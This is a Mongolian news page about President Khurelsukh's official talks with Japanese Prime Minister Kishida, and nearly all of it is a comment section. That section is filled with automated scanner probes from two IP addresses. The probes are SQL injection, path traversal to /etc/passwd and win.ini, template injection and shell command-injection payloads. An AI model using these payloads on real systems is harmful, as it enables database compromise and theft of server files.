Монгол Улсын Ерөнхийлөгч У.Хүрэлсүх Япон Улсын Ерөнхий сайд Ф.Кишидатай албан ёсны хэлэлцээ хийлээ

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-11-30 10:21:47
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 45 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • admin 185.234.72.114 45 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 45 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • admin 185.234.72.114 45 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 45 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin 185.234.72.114 45 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 45 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • admin 185.234.72.114 45 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 45 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • admin 185.234.72.114 45 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 45 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • admin 185.234.72.114 45 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 45 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • admin 185.234.72.114 45 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 45 өдөр

  123456"and"n"="x
 • admin 185.234.72.114 45 өдөр

  123456"and"t"="t
 • admin 185.234.72.114 45 өдөр

  123456'and'l'='g
 • admin 185.234.72.114 45 өдөр

  123456'and'u'='u
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456/**/and+3=6
 • ../../../../WEB-INF/web.xml 185.234.72.114 45 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456/**/and+3=3
 • ../../../WEB-INF/web.xml 185.234.72.114 45 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 45 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 45 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 45 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 45 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 45 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 45 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 45 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 45 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 45 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 45 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 45 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 45 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 45 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 45 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 45 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',12)='c 185.234.72.114 45 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 45 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 45 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s 185.234.72.114 45 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 45 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 185.234.72.114 45 өдөр

  123456
 • admin'"\( 185.234.72.114 45 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 45 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 45 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 185.234.72.114 45 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  <%- 947227291+981878414 %>
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 45 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 45 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1503631203')))>'0 185.234.72.114 45 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1047777565'))) 185.234.72.114 45 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  #set($c=830791595+945873198)${c}$c
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 185.234.72.114 45 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  ${(865370330+955430857)?c}
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 45 өдөр

  123456
 • admin/**/and/**/cast(md5('1804533294')as/**/int)>0 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  ${935500240+826178874}
 • %u2215etc%u2215passwd 185.234.72.114 45 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  /*1*/{{827036606+947109025}}
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 185.234.72.114 45 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 45 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1646019794)as/**/int))>'0 185.234.72.114 45 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1690200233))) 185.234.72.114 45 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1471589239)))and" 185.234.72.114 45 өдөр

  123456
 • /etc/passwd 185.234.72.114 45 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1481216531)))and' 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456'"\(
 • admin 185.234.72.114 45 өдөр

  123456鎈'"\(
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1661744123')))>'0
 • ./../../../../../../etc/passwd 185.234.72.114 45 өдөр

  123456
 • admin"and"g"="x 185.234.72.114 45 өдөр

  123456
 • expr 884810315 + 805533698 185.234.72.114 45 өдөр

  123456
 • <%- 839250894+856316852 %> 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1099696695')))
 • admin"and"y"="y 185.234.72.114 45 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456/**/and/**/cast(md5('1115752657')as/**/int)>0
 • ../../../../../../etc/passwd 185.234.72.114 45 өдөр

  123456
 • admin&set /A 878235649+876515150 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456'and(select'1'from/**/cast(md5(1523547678)as/**/int))>'0
 • admin$(expr 954991692 + 945277298) 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  extractvalue(1,concat(char(126),md5(1244819833)))
 • admin'and'p'='n 185.234.72.114 45 өдөр

  123456
 • admin'and't'='t 185.234.72.114 45 өдөр

  123456
 • admin|expr 995439653 + 813602063 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1429383353)))and"
 • '-var_dump(md5(213085068))-' 185.234.72.114 45 өдөр

  123456
 • ${900861216+866883968} 185.234.72.114 45 өдөр

  123456
 • admin expr 853432569 + 880568185 185.234.72.114 45 өдөр

  123456
 • ${@var_dump(md5(923558974))}; 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1629548768)))and'
 • #set($c=935220732+967766947)${c}$c 185.234.72.114 45 өдөр

  123456
 • nylklyugmftlhfqegdep 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  expr 915106867 + 963046078
 • admin 185.234.72.114 45 өдөр

  123456&set /A 878832641+817987257
 • admin 185.234.72.114 45 өдөр

  nylklyugmftlhfqegdep
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  '-var_dump(md5(376522820))-'
 • admin 185.234.72.114 45 өдөр

  123456$(expr 992358429 + 875438777)
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  ${@var_dump(md5(446088395))};
 • ${(942640933+998315469)?c} 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456|expr 822317640 + 976973687
 • admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • ${907043405+902033772} 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  ${810964613+882488518}
 • /*1*/{{961312784+941323483}} 185.234.72.114 45 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456
 • admin 185.234.72.114 45 өдөр

  123456 expr 992505441 + 839638740
 • admin 185.234.72.114 45 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 45 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 45 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 45 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 45 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',7)='q 194.163.191.42 45 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 45 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',0)='i 194.163.191.42 45 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 45 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:7 194.163.191.42 45 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 45 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 45 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 45 өдөр

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 45 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(7))::text>'0 194.163.191.42 45 өдөр

  123456
 • WEB-INF/web.xml 194.163.191.42 45 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 45 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 45 өдөр

  123456
 • admin"and(select*from(select+sleep(7))a/**/union/**/select+1)=" 194.163.191.42 45 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 45 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 45 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 45 өдөр

  123456
 • admin'and(select*from(select+sleep(7))a/**/union/**/select+1)=' 194.163.191.42 45 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 45 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 45 өдөр

  123456
 • ../../../../../../Windows/win.ini 194.163.191.42 45 өдөр

  123456
 • admin"and"v"="y 194.163.191.42 45 өдөр

  123456
 • admin"and"a"="a 194.163.191.42 45 өдөр

  123456
 • admin'and'y'='p 194.163.191.42 45 өдөр

  123456
 • admin'and's'='s 194.163.191.42 45 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',7)='t
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',0)='d
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('t',7)
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('e',0)
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:7
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:7'/**/
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 45 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(7))::text>'0
 • admin 194.163.191.42 45 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • expr 966538258 + 841225218 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(7))>0/**/
 • admin&set /A 988061655+858999862 194.163.191.42 45 өдөр

  123456
 • admin$(expr 878242793 + 822592977) 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin|expr 950182229 + 808922596 194.163.191.42 45 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
 • admin expr 834761171 + 842508019 194.163.191.42 45 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 45 өдөр

  123456
 • admin'"\( 194.163.191.42 45 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 194.163.191.42 45 өдөр

  expr 948901323 + 828075623
 • admin鎈'"\( 194.163.191.42 45 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'and(select*from(select+sleep(7))a/**/union/**/select+1)='
 • admin 194.163.191.42 45 өдөр

  123456&set /A 831445548+878493373
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1778203888')))>'0 194.163.191.42 45 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 45 өдөр

  123456$(expr 945895176 + 955487827)
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1795517186'))) 194.163.191.42 45 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  (select*from(select+sleep(7)union/**/select+1)a)
 • /etc/passwd 194.163.191.42 45 өдөр

  123456
 • admin/**/and/**/cast(md5('1351440925')as/**/int)>0 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 45 өдөр

  123456|expr 810224618 + 918913638
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 45 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1786499848)as/**/int))>'0 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456 expr 834967845 + 828372769
 • extractvalue(1,concat(char(126),md5(1998750606))) 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1096852013)))and" 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 45 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1640696359)))and' 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456"and"v"="z
 • admin 194.163.191.42 45 өдөр

  123456'"\(
 • admin 194.163.191.42 45 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 45 өдөр

  123456"and"t"="t
 • ../../../../../../etc/passwdadmin 194.163.191.42 45 өдөр

  123456
 • <%- 815190101+841621315 %> 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1420026499')))>'0
 • admin 194.163.191.42 45 өдөр

  123456'and'k'='l
 • ../../../../../../etc/passwd 194.163.191.42 45 өдөр

  123456
 • #set($c=983703765+816529306)${c}$c 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1241146309')))
 • ${(847685387+859067500)?c} 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456'and'v'='v
 • admin 194.163.191.42 45 өдөр

  123456/**/and/**/cast(md5('1029850981')as/**/int)>0
 • ${915307047+898984094} 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456/**/and+4=9
 • admin 194.163.191.42 45 өдөр

  123456'and(select'1'from/**/cast(md5(1205971871)as/**/int))>'0
 • admin 194.163.191.42 45 өдөр

  123456/**/and+2=2
 • admin 194.163.191.42 45 өдөр

  extractvalue(1,concat(char(126),md5(1164212018)))
 • /*1*/{{886228281+807062769}} 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1929513559)))and"
 • admin 194.163.191.42 45 өдөр

  <%- 974527677+899654683 %>
 • admin 194.163.191.42 45 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1259496548)))and'
 • '-var_dump(md5(416813035))-' 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  #set($c=933416023+803843048)${c}$c
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 45 өдөр

  123456
 • ${951763314+946561817} 194.163.191.42 45 өдөр

  123456
 • ${@var_dump(md5(807949862))}; 194.163.191.42 45 өдөр

  123456
 • ouebxzvvakroqcwzzjht 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  ${(834187288+975349664)?c}
 • admin 194.163.191.42 45 өдөр

  ${900267741+960976438}
 • admin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  '-var_dump(md5(422402104))-'
 • admin 194.163.191.42 45 өдөр

  /*1*/{{937531196+917380437}}
 • admin 194.163.191.42 45 өдөр

  ${995643690+820842135}
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  123456
 • admin 194.163.191.42 45 өдөр

  ouebxzvvakroqcwzzjht
 • admin 194.163.191.42 45 өдөр

  ${@var_dump(md5(588029625))};
 • admin 194.163.191.42 45 өдөр

  123456